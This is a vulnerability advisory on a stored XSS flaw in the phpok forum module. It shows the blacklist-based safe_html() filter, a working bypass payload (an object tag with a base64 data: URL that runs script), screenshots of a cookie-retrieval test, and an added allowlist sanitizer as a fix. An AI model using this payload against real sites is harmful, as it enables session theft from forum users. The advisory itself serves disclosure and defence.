### Brief description:
phpok (forum/BBS module) stored XSS
### Details:
The content filter `safe_html()` in phpok (as shown in the advisory; the elided part is omitted in the original):
```php
public function safe_html($content,$clear_url='')
{
$content = preg_replace_callback('/<(.+)>/isU',array($this,'_clean_xss_on'),$content);
// strip what is carried in src and href attributes
$content = preg_replace_callback("/<(.*)(src|href)\s*=(\"|')(.+)(\\3)(.*)>/isU",array($this,'_clean_xss_script'),$content);
// strip unquoted values passed via src
$content = preg_replace_callback("/<(.*)(src|href)\s*=([^\s>]+)([\s|\/|>])/isU",array($this,'_clean_xss_script2'),$content);
// strip unsafe tags such as script, applet, style, title, iframe
// (note: `[^script|...]` is a negated character class, not an alternation of tag names)
$content = preg_replace("/<(^[script|applet|style|title|iframe|frame|frameset|link]+).*>[.\n\t\r]*<\/\\1>/isU",'',$content);
$content = preg_replace("/<\/?link.*?>/isU","",$content);
// strip meta tags
$content = preg_replace('/<meta(.+)>/isU','',$content);
// ......... (remaining rules omitted in the advisory)
return $content;
}
```
The filter only inspects `src` and `href` and blacklists a fixed set of tag names, so an `<object>` whose `data` attribute carries a `data:` URL is not touched.
Bypass test:
```
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
```
![QQ截图20150414182421.png](https://images.seebug.org/upload/201504/1418243541f5bfbdae5a92b0c7d55b8bf4995359.png)
Cookie retrieval test:
![QQ截图20150414182719.png](https://images.seebug.org/upload/201504/14182738f24a403a6a82c5006b9fcc1416e72915.png)
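The fix a defender would want is to stop blacklisting tag names and instead parse the HTML and keep only an allowlist of tags, attributes and URL schemes. The following is an added example (PHP 7.4+, not phpok's own code; `safe_html_allowlist`, `sanitize_children`, `url_is_safe` and the allowlists are illustrative assumptions) that drops the `<object data="data:...">` payload from the bypass test above:

```php
<?php
// Added example (not phpok's own code): an allowlist sanitizer. The advisory's filter blacklists
// tag names and inspects only src/href, so <object data="data:..."> passes; allowlists here are assumptions.
const ALLOWED_TAGS    = ['p', 'br', 'b', 'i', 'u', 'strong', 'em', 'a', 'img', 'ul', 'ol', 'li'];
const ALLOWED_ATTRS   = ['a' => ['href', 'title'], 'img' => ['src', 'alt']];
const URL_ATTRS       = ['href', 'src'];
const ALLOWED_SCHEMES = ['http', 'https'];
// Relative URLs carry no scheme; absolute ones must use an allowed scheme (rejects data:, javascript:).
function url_is_safe(string $url): bool
{
    return !preg_match('/^\s*([a-z][a-z0-9+.\-]*):/i', $url, $m)
        || in_array(strtolower($m[1]), ALLOWED_SCHEMES, true);
}
function sanitize_children(DOMNode $node): void
{
    // Walk a snapshot: removing from the live childNodes list while iterating skips siblings.
    foreach (iterator_to_array($node->childNodes, false) as $child) {
        if (!($child instanceof DOMElement)) {
            if (!($child instanceof DOMText)) { $node->removeChild($child); } // comments, CDATA, PIs
            continue;
        }
        $tag = strtolower($child->tagName);
        if (!in_array($tag, ALLOWED_TAGS, true)) {
            $node->removeChild($child); // object, embed, script, iframe, ... removed with their content
            continue;
        }
        foreach (iterator_to_array($child->attributes, false) as $attr) {
            $name = strtolower($attr->name);
            if (!in_array($name, ALLOWED_ATTRS[$tag] ?? [], true)
                || (in_array($name, URL_ATTRS, true) && !url_is_safe($attr->value))) {
                $child->removeAttribute($attr->name); // on* handlers, style, data, ... are dropped
            }
        }
        sanitize_children($child);
    }
}
function safe_html_allowlist(string $content): string
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // tolerate the malformed HTML users post
    $doc->loadHTML('<?xml encoding="UTF-8" ?><div>' . $content . '</div>',
        LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();
    $root = $doc->getElementsByTagName('div')->item(0);
    sanitize_children($root);
    return implode('', array_map(fn($c) => $doc->saveHTML($c), iterator_to_array($root->childNodes, false)));
}
// Harmless markup followed by the advisory's payload: only "<b>hi</b>" survives.
echo safe_html_allowlist('<b>hi</b><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">'), "\n";
```

Because unknown tags are removed whole rather than matched by name, the same logic also covers `embed`, `svg`, `form` and any other element the blacklist regex never listed.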
### Proof of vulnerability:
![QQ截图20150414182421.png](https://images.seebug.org/upload/201504/1418243541f5bfbdae5a92b0c7d55b8bf4995359.png)